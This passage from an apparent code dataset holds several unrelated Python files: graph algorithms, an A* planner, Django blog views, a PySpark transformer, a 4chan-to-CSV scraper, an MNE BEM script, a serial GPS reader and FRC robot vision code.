range(1, len(words)):\n prev, curr = words[i - 1], words[i]\n l = min(len(prev), len(curr))\n for j in range(l):\n if prev[j] != curr[j]:\n if curr[j] not in graph[prev[j]]:\n graph[prev[j]].add(curr[j])\n counter[curr[j]] += 1\n break\n q = deque()\n for k, v in counter.items():\n if v == 0:\n q.append(k)\n result = ''\n while q:\n curr = q.popleft()\n result += curr\n for child in graph[curr]:\n counter[child] -= 1\n if counter[child] == 0:\n q.append(child)\n return result if len(result) == len(graph.keys()) else ''\n\n # # DFS\n # def alienOrder(self, words: List[str]) -> str:\n # visited, graph = {}, {}\n # for word in words:\n # for c in word:\n # graph[c] = set()\n # visited[c] = 0\n # for i in range(1, len(words)):\n # prev, curr = words[i-1], words[i]\n # l = min(len(prev), len(curr))\n # for j in range(l):\n # if prev[j] != curr[j]:\n # graph[prev[j]].add(curr[j])\n # break\n # result = []\n # for k in graph.keys():\n # if not self.dfs(k, visited, graph, result):\n # return ''\n # return ''.join(result)\n\n # def dfs(self, c, visited, graph, result):\n # if visited[c] == 1: return True\n # if visited[c] == -1: return False\n # visited[c] = -1\n # for child in graph[c]:\n # if not self.dfs(child, visited, graph, result):\n # return False\n # visited[c] = 1\n # result.insert(0, c)\n # return True","sub_path":"269.py","file_name":"269.py","file_ext":"py","file_size_in_byte":2348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"579108561","text":"from utils import *\nimport numpy as np\nimport pandas as pd\nimport basc_py4chan as bp4\nfrom collections import defaultdict\nfrom os import path\nfrom bs4 import BeautifulSoup as Soup\n\nstart = start_timer()\nrelPath = r'data\\\\'\n\ndef boardToCSV(boardStr):\n boardTag = '/' + boardStr + '/'\n print('Processing Board: ' + boardTag)\n board = bp4.Board(boardStr)\n threads = board.get_all_threads()\n dictDF = defaultdict(list)\n for thread in threads:\n for post in thread.posts:\n dictDF['Board'].append(boardTag)\n dictDF['Post ID'].append(post.post_id)\n dictDF['Subject'].append(post.subject)\n dictDF['Comment'].append(post.comment)\n dictDF['Image URL'].append(post.file1.file_url if post.has_file else None)\n df = pd.DataFrame(data = dictDF)\n df.to_csv(os.path.join(relPath, boardStr + '.csv'))\n print('Wrote Data Frame to ' + boardStr + '.csv')\n print(df)\n print('Done with: ' + boardTag)\n return df\n\ndef processBoards(boardsList):\n dfList = []\n for board in boardsList:\n dfList.append(boardToCSV(board))\n dfBoards = pd.concat(dfList)\n dfBoards.to_csv(os.path.join(relPath, '4chan.csv'))\n print(dfBoards)\n return dfBoards\n\ndef main():\n df4chan = processBoards(boardsList=['pol', 'v', 'g', 'mu', 'fit', 'vg', 'r9k'])\n print_run_data(start)\n\nif __name__ == \"__main__\":\n main()","sub_path":"scrape_py4chan/csv4chan.py","file_name":"csv4chan.py","file_ext":"py","file_size_in_byte":1395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"490164940","text":"# Create your views here.\nimport json\n\nfrom django.core import serializers\nfrom django.core.serializers import serialize\nfrom django.forms import model_to_dict\nfrom django.http import JsonResponse\n\nfrom blog_api.models import Article\n\n\n# 新增文章\ndef add_article(request):\n if request.method == \"POST\":\n req = json.loads(request.body)\n print(req)\n key_flag = req.get(\"title\") and req.get(\"content\") and len(req) == 2\n # 判断请求体是否正确\n if key_flag:\n title = req[\"title\"]\n content = req[\"content\"]\n # title返回的是一个list\n title_exist = Article.objects.filter(title=title)\n # 判断是否存在同名title\n if len(title_exist) != 0:\n return JsonResponse({\"status\": \"BS.400\", \"msg\": \"title aleady exist,fail to publish.\"})\n\n '''插入数据'''\n add_art = Article(title=title, content=content, status=\"alive\")\n add_art.save()\n return JsonResponse({\"status\": \"BS.200\", \"msg\": \"publish article sucess.\"})\n else:\n return JsonResponse({\"status\": \"BS.400\", \"message\": \"please check param.\"})\n\n # 查询所有文章和状态\n if request.method == \"GET\":\n articles = []\n query_arts = Article.objects.all()\n for article in query_arts:\n articles.append(model_to_dict(article))\n return JsonResponse({\"status\": \"BS.200\", \"all_titles\": articles, \"msg\": \"query articles sucess.\"})\n\n\ndef modify_article(request, art_id):\n # get文章bY ID\n if request.method == \"GET\":\n article = {}\n query_art = Article.objects.get(id=art_id)\n # model_to_dict model reset to dict\n return JsonResponse({\"status\": \"BS.200\", \"single title\": model_to_dict(query_art ) , \"msg\": \"query articles sucess By id\"})\n # 修改文章\n if request.method == \"PUT\":\n req = json.loads(request.body)\n try:\n art = Article.objects.get(id=art_id)\n key_flag = req.get(\"title\") and req.get(\"content\") and len(req) == 2\n if key_flag:\n title = req[\"title\"]\n content = req[\"content\"]\n title_exist = Article.objects.filter(title=title)\n if len(title_exist) > 1:\n return JsonResponse({\"status\": \"BS.400\", \"msg\": \"title aleady exist.\"})\n '''更新数据'''\n old_art = Article.objects.get(id=art_id)\n old_art.title = title\n old_art.content = content\n old_art.save()\n return JsonResponse({\"status\": \"BS.200\", \"msg\": \"modify article sucess.\"})\n except Article.DoesNotExist:\n return JsonResponse({\"status\": \"BS.300\", \"msg\": \"article is not exists,fail to modify.\"})\n\n # 删除文章\n if request.method == \"DELETE\":\n try:\n art = Article.objects.get(id=art_id)\n art_id = art.id\n art.delete()\n return JsonResponse({\"status\": \"BS.200\", \"msg\": \"delete article sucess.\"})\n except Article.DoesNotExist:\n return JsonResponse({\"status\": \"BS.300\", \"msg\": \"article is not exists,fail to delete.\"})\n","sub_path":"blog_api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"42069396","text":"from pyspark import keyword_only \nfrom pyspark.ml import Transformer\nfrom pyspark.ml.param.shared import HasInputCol, HasOutputCol\nfrom pyspark.sql.functions import udf\nfrom pyspark.sql.types import StringType\n\nMAX_X1 = 663\nMAX_Y1 = 1112\nMAX_X2 = 743\nMAX_Y2 = 1192\nMEAN_X1 = 113\nMEAN_Y1 = 196\nMEAN_X2 = 134\nMEAN_Y2 = 218\nFAIXA_X1 = 200\nFAIXA_Y1 = 200\nFAIXA_X2 = 200\nFAIXA_Y2 = 200\n\nclass FillerColumnTransformer(Transformer, HasInputCol, HasOutputCol):\n\n @keyword_only\n def __init__(self, inputCol=None, outputCol=None):\n super(FillerColumnTransformer, self).__init__()\n kwargs = self._input_kwargs\n self.setParams(**kwargs)\n\n @keyword_only\n def setParams(self, inputCol=None, outputCol=None, stopwords=None):\n kwargs = self._input_kwargs\n return self._set(**kwargs)\n \n @staticmethod\n def get_binary_input_x1(value):\n if(value == -1):\n value = MEAN_X1\n \n binary_input = bin(value)[2:]\n \n for i in range(len(binary_input), len(bin(MAX_X1))):\n binary_input = \"0\" + binary_input\n \n return binary_input\n \n @staticmethod\n def get_binary_input_y1(value):\n if(value == -1):\n value = MEAN_Y1\n \n binary_input = bin(value)[2:]\n \n for i in range(len(binary_input), len(bin(MAX_Y1))):\n binary_input = \"0\" + binary_input\n \n return binary_input\n \n @staticmethod\n def get_binary_input_x2(value):\n if(value == -1):\n value = MEAN_X2\n \n binary_input = bin(value)[2:]\n \n for i in range(len(binary_input), len(bin(MAX_X2))):\n binary_input = \"0\" + binary_input\n \n return binary_input\n \n @staticmethod\n def get_binary_input_y2(value):\n if(value == -1):\n value = MEAN_Y2\n \n binary_input = bin(value)[2:]\n \n for i in range(len(binary_input), len(bin(MAX_Y2))):\n binary_input = \"0\" + binary_input\n \n return binary_input\n \n @staticmethod\n def get_binary_input_x1_thermometer(value):\n if(value == -1):\n value = MEAN_X1\n \n binary_input = bin(value)[2:]\n \n for i in range(len(binary_input), len(bin(MAX_X1/FAIXA_X1))):\n binary_input = \"0\" + binary_input\n \n return binary_input\n \n @staticmethod\n def get_binary_input_y1_thermometer(value):\n if(value == -1):\n value = MEAN_Y1\n \n binary_input = bin(value)[2:]\n \n for i in range(len(binary_input), len(bin(MAX_Y1/FAIXA_Y1))):\n binary_input = \"0\" + binary_input\n \n return binary_input\n \n @staticmethod\n def get_binary_input_x2_thermometer(value):\n if(value == -1):\n value = MEAN_X2\n \n binary_input = bin(value)[2:]\n \n for i in range(len(binary_input), len(bin(MAX_X2/FAIXA_X2))):\n binary_input = \"0\" + binary_input\n \n return binary_input\n \n @staticmethod\n def get_binary_input_y2_thermometer(value):\n if(value == -1):\n value = MEAN_Y2\n \n binary_input = bin(value)[2:]\n \n for i in range(len(binary_input), len(bin(MAX_Y2/FAIXA_Y2))):\n binary_input = \"0\" + binary_input\n \n return binary_input\n \n @staticmethod\n def get_concat_column(x1, y1, x2, y2):\n return x1 + y1 + x2 + y2\n \n @staticmethod\n def get_sum_column(x1, y1, x2, y2):\n return str(x1 + y1) + str(x2 + y2)\n \n def _transform(self, dataset):\n return dataset\n \n def _transform_x1(self, dataset):\n f = udf(self.get_binary_input_x1, StringType())\n \n return dataset.withColumn('integralX1', f(dataset['x1']))\n \n def _transform_y1(self, dataset):\n f = udf(self.get_binary_input_y1, StringType())\n \n return dataset.withColumn(\"integralY1\", f(dataset[\"y1\"]))\n \n def _transform_x2(self, dataset):\n f = udf(self.get_binary_input_x2, StringType())\n \n return dataset.withColumn(\"integralX2\", f(dataset[\"x2\"]))\n \n def _transform_y2(self, dataset):\n f = udf(self.get_binary_input_y2, StringType())\n \n return dataset.withColumn(\"integralY2\", f(dataset[\"y2\"]))\n \n def _transform_x1_thermometer(self, dataset):\n f = udf(self.get_binary_input_x1_thermometer, StringType())\n \n return dataset.withColumn('integralX1', f(dataset['x1']))\n \n def _transform_y1_thermometer(self, dataset):\n f = udf(self.get_binary_input_y1_thermometer, StringType())\n \n return dataset.withColumn(\"integralY1\", f(dataset[\"y1\"]))\n \n def _transform_x2_thermometer(self, dataset):\n f = udf(self.get_binary_input_x2_thermometer, StringType())\n \n return dataset.withColumn(\"integralX2\", f(dataset[\"x2\"]))\n \n def _transform_y2_thermometer(self, dataset):\n f = udf(self.get_binary_input_y2_thermometer, StringType())\n \n return dataset.withColumn(\"integralY2\", f(dataset[\"y2\"]))\n \n #concatena as entradas\n def _transform_2(self, dataset):\n f = udf(self.get_concat_column, StringType())\n \n return dataset.withColumn(\"features\", f(dataset[\"integralX1\"], dataset[\"integralY1\"], dataset[\"integralX2\"], dataset[\"integralY2\"]))\n \n #concatena as entradas somando\n def _transform_3(self, dataset):\n f = udf(self.get_sum_column, StringType())\n \n return dataset.withColumn(\"input\", f(dataset[\"x1\"], dataset[\"y1\"], dataset[\"x2\"], dataset[\"y2\"]))","sub_path":"filler_column_transformer.py","file_name":"filler_column_transformer.py","file_ext":"py","file_size_in_byte":5798,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"547976260","text":"import sys\nimport stack\nimport myQueue\nclass Graph:\n\n\tdef __init__(self, numVariables):\n\t\tself.mNumVariables = int(numVariables)\n\t\tself.mNeighbors = [list() for x in range(self.mNumVariables)]\n\tdef addEdge(self,v0,v1):\n\t\tself.mNeighbors[v0].append(v1)\n\tdef depthFirstSearch(self,v0,v1):\n\t\tvisited = []\n\t\tstack1 = stack.Stack()\n\t\tstack1.push(v0)\n\t\tvisited.append(v0)\n\t\twhile stack1.top() != v1:\n\t\t\tif stack1.empty() == True:\n\t\t\t\treturn None\n\t\t\tneighbors = self.getNeighbors(stack1.top())\n\t\t\tpossible_visit = []\n\t\t\tcan_visit = False\n\t\t\tfor x in neighbors:\n\t\t\t\tif x not in visited:\n\t\t\t\t\tpossible_visit.append(x)\n\t\t\t\t\tcan_visit = True\n\t\t\tif can_visit == False:\n\t\t\t\tstack1.pop()\n\t\t\t\tcontinue\n\t\t\telse:\n\t\t\t\tnext_visit = min(possible_visit)\n\t\t\t\tstack1.push(next_visit)\n\t\t\t\tvisited.append(next_visit)\n\t\tpath = []\n\t\twhile stack1.empty() == False:\n\t\t\tpath.append(stack1.pop())\n\t\tpath.reverse()\n\t\treturn path\n\tdef breadthFirstSearch(self, v0,v1):\n\t\tprevious = [-1] * self.mNumVariables\n\t\tq = myQueue.Queue()\n\t\tq.enqueue(v0)\n\t\tprevious[v0] = v0\n\t\tpath = []\n\t\twhile q.empty() == False:\n\t\t\tcurrent = q.dequeue()\n\t\t\t# if current is destination that we want, we want to reconstruct the path and return it, and brake the loop\n\t\t\tif current == v1:\n\t\t\t\tcurrent_path = v1\n\t\t\t\tnext_path = v1\n\t\t\t\tcount = 0\n\t\t\t\tpath.append(current_path)\n\t\t\t\tnext_path = previous[path[count]]\n\t\t\t\twhile current_path != next_path:\n\t\t\t\t\tpath.append(next_path)\n\t\t\t\t\tcurrent_path = next_path\n\t\t\t\t\tnext_path = previous[path[count + 1]]\n\t\t\t\t\tcount += 1\n\t\t\t\tpath.reverse()\n\t\t\t\treturn path\n\t\t\tneighbors = self.getNeighbors(current)\n\t\t\tneighbors.sort()\n\t\t\tfor x in neighbors:\n\t\t\t\tif previous[x] == -1:\n\t\t\t\t\tq.enqueue(x)\n\t\t\t\t\tprevious[x] = current\n\t\treturn None\n\tdef getNeighbors(self,v):\n\t\treturn self.mNeighbors[v]\n\tdef getEdges(self):\n\t\treturn self.mNeighbors\n\tdef isEdge(self,v0,v1):\n\t\tfor x in self.mNeighbors[v0]:\n\t\t\tif x == v1:\n\t\t\t\treturn True\n\t\t\telse:\n\t\t\t\treturn False\n\ndef main():\n\twith open(sys.argv[1], 'r') as file:\n\t\tcount = 0\n\t\tnumEdges = 0\n\t\tfor line in file:\n\t\t\tif count == 0:\n\t\t\t\tnumVertices = int(line.strip())\n\t\t\t\tgraph = Graph(numVertices)\n\t\t\t\tcount += 1\n\t\t\t\tcontinue\n\t\t\tif count == 1:\n\t\t\t\tnumEdges = int(line.strip())\n\t\t\t\tcount += 1\n\t\t\t\tcontinue\n\t\t\tif count >= 2 and count < (2 + numEdges):\n\t\t\t\tdata = line.split()\n\t\t\t\tgraph.addEdge(int(data[0]), int(data[1]))\n\t\t\t\tcount += 1\n\t\t\t\tcontinue\n\t\t\tif count == (2 + numEdges):\n\t\t\t\tnumTest = int(line.strip())\n\t\t\t\tcount +=1\n\t\t\t\tcontinue\n\t\t\tif count > (2 + numEdges):\n\t\t\t\ttest = line.split()\n\t\t\t\tprint(\"Running breadthFirst Search\")\n\t\t\t\tpath = graph.breadthFirstSearch(int(test[0]), int(test[1]))\n\t\t\t\tprint(path)\n\t\t\t\tprint(\"Running depthFirst Search\")\n\t\t\t\tpath = graph.depthFirstSearch(int(test[0]), int(test[1]))\n\t\t\t\tprint(path)\n\t\t\t\tcount +=1\n\t\t\t\tcontinue\n\nif __name__ == \"__main__\":\n\tmain()","sub_path":"Assignment-10/graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":2803,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"540723050","text":"from lib.vec2d import Vec2d\nfrom collections import defaultdict\nfrom lib.ecs.component.shape import ShapeComponent\nfrom lib.geometry.util import (\n distance_between,\n intersect_polygons,\n)\n\nclass AStarPlanner(object):\n def __init__(self):\n self.polygons = []\n self.nodes = []\n self.neighbors = defaultdict(list)\n\n def add_polygon(self, polygon):\n self.polygons.append(polygon)\n self.nodes.extend(polygon.get_points())\n\n def add_polygons(self, polygons):\n for polygon in polygons:\n self.add_polygon(polygon)\n\n def register_obstacle(self, entity, agent):\n shape_component = entity[ShapeComponent]\n self.add_polygon(shape_component.compute_c_polygon(agent))\n\n def init(self):\n self.compute_neighbours()\n\n # TODO: optimize this (spatial partitioning?)\n def compute_neighbours(self):\n for node_a in self.nodes:\n for node_b in self.nodes:\n if node_a == node_b:\n continue\n\n node_within_polygon = False\n for polygon in self.polygons:\n if polygon.contains_point(node_a) or polygon.contains_point(node_b):\n node_within_polygon = True\n\n if node_within_polygon:\n continue\n\n if not intersect_polygons([node_a, node_b], self.polygons):\n self.neighbors[node_a].append(node_b)\n\n def init_start_goal(self, start_node, goal_node):\n self.clean_start_node = True\n self.clean_goal_node = True\n\n for start_goal_node in [start_node, goal_node]:\n for node in self.nodes:\n if start_goal_node == node:\n if start_goal_node == start_node:\n self.clean_start_node = False\n elif start_goal_node == goal_node:\n self.clean_goal_node = False\n elif not intersect_polygons([start_goal_node, node], self.polygons):\n if node not in self.neighbors[start_goal_node]:\n self.neighbors[start_goal_node].append(node)\n\n if start_goal_node not in self.neighbors[node]:\n self.neighbors[node].append(start_goal_node)\n\n def cleanup_start_goal(self, start_node, goal_node):\n if self.clean_start_node:\n self.remove_node(start_node)\n\n if self.clean_goal_node:\n self.remove_node(goal_node)\n\n def remove_node(self, r_node):\n try:\n self.nodes.remove(r_node)\n except ValueError:\n pass\n\n self.neighbors.pop(r_node)\n\n for node, neighbors in self.neighbors.iteritems():\n try:\n neighbors.remove(r_node)\n except ValueError:\n pass\n\n def draw_neighbors(self, renderer, color=(0, 0, 0)):\n for node, neighbors in self.neighbors.iteritems():\n for neighbor in neighbors:\n renderer.draw_lines([node, neighbor], color)\n\n def find_path(self, x1, y1, x2, y2):\n start_node = Vec2d(x1, y1)\n goal_node = Vec2d(x2, y2)\n\n if not intersect_polygons([start_node, goal_node], self.polygons):\n return [goal_node]\n\n for polygon in self.polygons:\n if polygon.contains_point(Vec2d(x2, y2)):\n return None\n\n self.init_start_goal(start_node, goal_node)\n\n closed_set = set()\n open_set = set([start_node])\n\n path_map = {}\n gx_map = { start_node: 0 }\n hx_map = {}\n\n while len(open_set) > 0:\n current_node = min(open_set, key=lambda node:gx_map[node] + hx_map.setdefault(node, distance_between(node, goal_node)))\n if current_node == goal_node:\n break\n\n open_set.remove(current_node)\n closed_set.add(current_node)\n\n neighbors = self.neighbors[current_node]\n\n for neighbor in neighbors:\n if neighbor in closed_set:\n continue\n\n gx = distance_between(neighbor, current_node) + gx_map[current_node]\n hx = hx_map.setdefault(neighbor, distance_between(neighbor, goal_node))\n\n if neighbor in open_set:\n if gx < gx_map[neighbor]:\n gx_map[neighbor] = gx\n path_map[neighbor] = current_node\n else:\n gx_map[neighbor] = gx\n path_map[neighbor] = current_node\n open_set.add(neighbor)\n\n\n if current_node != goal_node:\n return None\n\n path = []\n path_node = goal_node\n while path_node is not None:\n path.append(path_node.copy())\n path_node = path_map.get(path_node)\n\n # Remove the starting node\n path.pop()\n path.reverse()\n\n self.cleanup_start_goal(start_node, goal_node)\n \n return path\n","sub_path":"lib/pathfinding/astar/astarplanner.py","file_name":"astarplanner.py","file_ext":"py","file_size_in_byte":5001,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"562871343","text":"\"\"\"\n===================\nCreate BEM surfaces\n===================\n\nExtract the BEM surfaces using the watershed algorithm. This is required to\nproduce the forward solution in the next step.\n\"\"\"\n\nimport logging\nfrom pathlib import Path\n\nimport mne\nfrom mne.parallel import parallel_func\n\nimport config\nfrom config import gen_log_message, on_error, failsafe_run\n\nlogger = logging.getLogger('mne-bids-pipeline')\n\n\n@failsafe_run(on_error=on_error)\ndef make_bem(subject):\n fs_subject = config.get_fs_subject(subject)\n fs_subjects_dir = config.get_fs_subjects_dir()\n mri_dir = Path(fs_subjects_dir) / fs_subject / 'mri'\n bem_dir = Path(fs_subjects_dir) / fs_subject / 'bem'\n watershed_bem_dir = bem_dir / 'watershed'\n flash_bem_dir = bem_dir / 'flash'\n flash_dir = mri_dir / 'flash' / 'parameter_maps'\n show = True if config.interactive else False\n\n if config.bem_mri_images == 'FLASH' and not flash_dir.exists():\n raise RuntimeError('Cannot locate FLASH MRI images.')\n elif config.bem_mri_images == 'FLASH':\n mri_images = 'FLASH'\n elif config.bem_mri_images == 'auto' and flash_dir.exists():\n mri_images = 'FLASH'\n else:\n mri_images = 'T1'\n\n if ((mri_images == 'FLASH' and flash_bem_dir.exists()) or\n (mri_images == 'T1' and watershed_bem_dir.exists())):\n msg = 'Found existing BEM surfaces. '\n if config.recreate_bem:\n msg += 'Overwriting as requested in configuration.'\n logger.info(gen_log_message(step=10, message=msg))\n else:\n msg = 'Skipping surface extraction as requested in configuration.'\n logger.info(gen_log_message(step=10, message=msg))\n return\n\n if mri_images == 'FLASH':\n msg = 'Creating BEM surfaces from FLASH MRI images'\n bem_func = mne.bem.make_flash_bem\n else:\n msg = ('Creating BEM surfaces from T1-weighted MRI images using '\n 'watershed algorithm')\n bem_func = mne.bem.make_watershed_bem\n\n logger.info(gen_log_message(step=10, message=msg))\n bem_func(subject=fs_subject,\n subjects_dir=fs_subjects_dir,\n copy=True,\n overwrite=True,\n show=show)\n\n\ndef main():\n \"\"\"Run BEM surface extraction.\"\"\"\n msg = 'Running Step 10: Create BEM surfaces'\n logger.info(gen_log_message(step=10, message=msg))\n\n if not config.run_source_estimation:\n msg = ' … skipping: run_source_estimation is set to False.'\n logger.info(gen_log_message(step=10, message=msg))\n return\n\n parallel, run_func, _ = parallel_func(make_bem, n_jobs=config.N_JOBS)\n parallel(run_func(subject) for subject in config.get_subjects())\n\n msg = 'Completed Step 10: Create BEM surfaces'\n logger.info(gen_log_message(step=10, message=msg))\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"scripts/source/01-make_bem_surfaces.py","file_name":"01-make_bem_surfaces.py","file_ext":"py","file_size_in_byte":2852,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"84747611","text":"\nimport serial\nimport datetime\nfrom mintsXU4 import mintsSensorReader as mSR\nfrom mintsXU4 import mintsDefinitions as mD\nimport time\nimport serial\nimport pynmea2\nfrom collections import OrderedDict\nimport os\n\ndataFolder = mD.dataFolder\n# duePort = mD.duePort\ngpsPort = mD.gpsPort\n\nbaudRate = 9600\n\n\n\n\ndef main():\n\n reader = pynmea2.NMEAStreamReader()\n ser = serial.Serial(\n port= gpsPort,\\\n baudrate=baudRate,\\\n parity =serial.PARITY_NONE,\\\n stopbits=serial.STOPBITS_ONE,\\\n bytesize=serial.EIGHTBITS,\\\n timeout=0)\n\n lastGPRMC = time.time()\n lastGPGGA = time.time()\n delta = 2\n print(\"connected to: \" + ser.portstr)\n\n #this will store the line\n line = []\n while True:\n try:\n for c in ser.read():\n line.append(chr(c))\n if chr(c) == '\\n':\n dataString = (''.join(line))\n dateTime = datetime.datetime.now()\n if (dataString.startswith(\"$GPGGA\") and mSR.getDeltaTime(lastGPGGA,delta)):\n mSR.GPSGPGGA2Write(dataString,dateTime)\n lastGPGGA = time.time()\n if (dataString.startswith(\"$GPRMC\") and mSR.getDeltaTime(lastGPGGA,delta)):\n mSR.GPSGPRMC2Write(dataString,dateTime)\n lastGPRMC = time.time()\n line = []\n break\n except:\n print(\"Incomplete String Read\")\n line = []\n\n ser.close()\n\n\n\nif __name__ == \"__main__\":\n print(\"=============\")\n print(\" MINTS \")\n print(\"=============\")\n os.system(\"sudo chmod a+rw \" + gpsPort)\n print(\"Monitoring Ozone Sensor on port: {0}\".format(gpsPort[0])+ \" with baudrate \" + str(baudRate))\n main()\n","sub_path":"scripts/GPSReader.py","file_name":"GPSReader.py","file_ext":"py","file_size_in_byte":1772,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"428707943","text":"#----------------------------------------------------------------------------------------------#\n# North Canton Hoover High School #\n# #\n# Team 4121 - Norsemen Robotics #\n# #\n# Vision & Motion Processing Code #\n#----------------------------------------------------------------------------------------------#\n# #\n# This code continuously analyzes images from one or more USB cameras to identify on field #\n# game pieces and vision targets. For game pieces, the code will identify all game pieces #\n# within the camera's field of view and determine the closest one. The distance and angle #\n# to the closest game piece is calculated and made available to the main robot code through #\n# network tables. The closest game piece is highlighted with a green box while all other #\n# found game pieces are highlighted with a red box. The annotated video is streamed to the #\n# driver station for display. The annotated video is also saved to a file for post game #\n# review and analysis. For vision targets, the code will identify all vision targets and #\n# calculate the angle and distance to each one. Vision target information is made available #\n# to the main robot code through network tables. #\n# #\n# This code also continuously interrogates a VMX-Pi board to determine linear and angular #\n# motion in all three axes. This information is made available to the main robot code #\n# through network tables. #\n# #\n#----------------------------------------------------------------------------------------------#\n# #\n# Authors: Jonas Muhlenkamp #\n# Ricky Park #\n# Tresor Nshimiye #\n# Tim Fuller #\n# #\n# Creation Date: 3/1/2018 #\n# #\n# Revision: 3.0 #\n# #\n# Revision Date: 2/18/2019 #\n# #\n#----------------------------------------------------------------------------------------------#\n\n#!/usr/bin/env python3\n\n#System imports\nimport sys\nimport imp\n\n#Setup paths\nsys.path.append('/home/pi/.local/lib/python3.5/site-packages')\nsys.path.append('/usr/local/lib/vmxpi/')\n\n#Module imports\nimport cv2 as cv\nimport numpy as np\nimport datetime\nimport time\nimport logging\nimport argparse\nfrom operator import itemgetter\nimport math\nimport cscore as cs\nfrom cscore import CameraServer\nfrom networktables import NetworkTables\nfrom time import sleep\n\n#Set up basic logging\nlogging.basicConfig(level=logging.DEBUG)\n\n#Initialize operating constants\nimgWidthVision = 320 \nimgHeightVision = 240\nimgWidthDriver = 160\nimgHeightDriver = 120\ncameraFieldOfView = 27.3\n\n#Define program control flags\nwriteVideo = True\nsendVisionToDashboard = False\n\n#Define image processing method\ndef process_image(imgRaw, hsvMin, hsvMax):\n \n #Blur image to remove noise\n blur = cv.GaussianBlur(imgRaw.copy(),(7,7),0)\n \n #Convert from BGR to HSV colorspace\n hsv = cv.cvtColor(blur, cv.COLOR_BGR2HSV)\n\n #Set pixels to white if in target\n #HSV range, else set to black\n mask = cv.inRange(hsv, hsvMin, hsvMax)\n mask = cv.erode(mask, None, iterations=2)\n mask = cv.dilate(mask, None, iterations=2)\n\n #Find contours in mask\n _, contours, _ = cv.findContours(mask,cv.RETR_EXTERNAL,cv.CHAIN_APPROX_SIMPLE)\n\n return contours\n\n\n#Define processing class\ndef detect_ball_target(imgRaw):\n\n #Define constraints for ball detection\n ballRadius = 6.5 #in inches\n minRadius = 50 #in pixels, this can be tweaked as needed\n\n #Define the lower and upper boundaries of the \"green\"\n #ball in the HSV color space\n ballHSVMin = (0, 174, 0)\n ballHSVMax = (10, 255, 255)\n \n #Values to be returned\n targetRadius = 0 #px\n targetX = -1 #px\n targetY = -1 #px\n distanceToBall = -1 #inches\n angleToBall = -1000 #degrees\n ballOffset = -1000\n screenPercent = -1\n foundBall = False;\n\n #Find contours in the mask and clean up the return style from OpenCV\n ballContours = process_image(imgRaw, ballHSVMin, ballHSVMax)\n\n if len(ballContours) == 2:\n ballContours = ballContours[0]\n elif len(ballContours) == 3:\n ballContours = ballContours[1]\n\n #Only proceed if at least one contour was found\n if len(ballContours) > 0:\n \n largestContour = max(ballContours, key=cv.contourArea)\n ((x, y), radius) = cv.minEnclosingCircle(largestContour)\n\n if radius > minRadius:\n\n targetRadius = radius\n targetX = x\n targetY = y\n foundBall = True\n\n #Distance and angle offset calculations\n if targetRadius > 0:\n \n inches_per_pixel = ballRadius/targetRadius #set up a general conversion factor\n distanceToBall = inches_per_pixel * (imgWidthVision / (2 * math.tan(math.radians(cameraFieldOfView))))\n offsetInInches = inches_per_pixel * (targetX - imgWidthVision / 2)\n angleToBall = math.degrees(math.atan((offsetInInches / distanceToBall)))\n screenPercent = cv.contourArea(largestContour) / (imgWidthVision * imgHeightVision)\n ballOffset = imgWidthVision/2 - targetX\n \n else:\n \n distanceToBall = -1\n angleToBall = float('nan')\n\n return targetX, targetY, targetRadius, distanceToBall, angleToBall, ballOffset, screenPercent, foundBall\n\n \n#Define floor alignment tape detection method\ndef detect_floor_tape(imgRaw):\n \n #Define constraints for detecting floor tape\n floorTapeWidth = 2.0 #in inches\n floorTapeLength = 18.0 #in inches\n minTapeArea = 100 #in square px, can be tweaked if needed\n\n #Define HSV range for white alignment tape\n tapeHSVMin = (0, 0, 68)\n tapeHSVMax = (192, 100, 255)\n\n #Values to be returned\n targetX = -1\n targetY = -1\n targetW = -1\n targetH = -1\n centerOffset = float('nan')\n foundTape = False\n \n #Find alignment tape in image\n tapeContours = process_image(imgRaw, tapeHSVMin, tapeHSVMax)\n \n #Continue with processing if alignment tape found\n if len(tapeContours) > 0:\n\n #find the largest contour and check it against the mininum tape area\n largestContour = max(tapeContours, key=cv.contourArea)\n\n if cv.contourArea(largestContour) > minTapeArea:\n \n targetX, targetY, targetW, targetH = cv.boundingRect(largestContour)\n foundTape = True\n\n #calculate center offset of tape\n centerOffset = (imgWidthVision / 2) - (targetX + (targetW / 2))\n\n return targetX, targetY, targetW, targetH, centerOffset, foundTape\n\n\n#Define contour detector function\ndef detect_vision_targets(imgRaw):\n\n #Set constraints for detecting vision targets\n visionTargetWidth = 3.313 #in inches\n visionTargetHeight = 5.826 #in inches\n minTargetArea = 750 #in square px, for individual pieces of tape, calculated for viewing from ~4ft\n minRegionArea = 3200 #in square px, for paired pieces of tape, calculated for viewing from ~4ft\n\n #Define HSV range for cargo ship vision targets\n #values with light in Fab Lab\n visionTargetHSVMin = (77, 131, 73)\n visionTargetHSVMax = (96, 255, 255)\n #values from image testing\n #visionTargetHSVMin = (63, 0, 87)\n #visionTargetHSVMax = (108, 255, 255)\n\n #List to collect datapoints of all contours located\n #Append tuples in form (x, y, w, h, a)\n visionTargetValues = []\n\n #List to collect datapoints and area of all paired contours calculated\n #Append tuples in form (regionArea, x, y, w, h)\n visionRegionValues = []\n\n #Other processing values\n inchesPerPixel = -1\n diffTargets = -1\n \n #Values to be returned\n targetX = -1\n targetY = -1\n targetW = -1\n targetH = -1\n centerOffset = 1000\n distanceToVisionTarget = -1\n angleToVisionTarget = 1000 #default set to not-a-number\n foundVisionTarget = False\n\n #Find contours in mask\n visionTargetContours = process_image(imgRaw, visionTargetHSVMin, visionTargetHSVMax)\n \n #only continue if contours are found\n if len(visionTargetContours) > 0:\n \n #Loop over all contours\n for testContour in visionTargetContours:\n\n #Get bounding 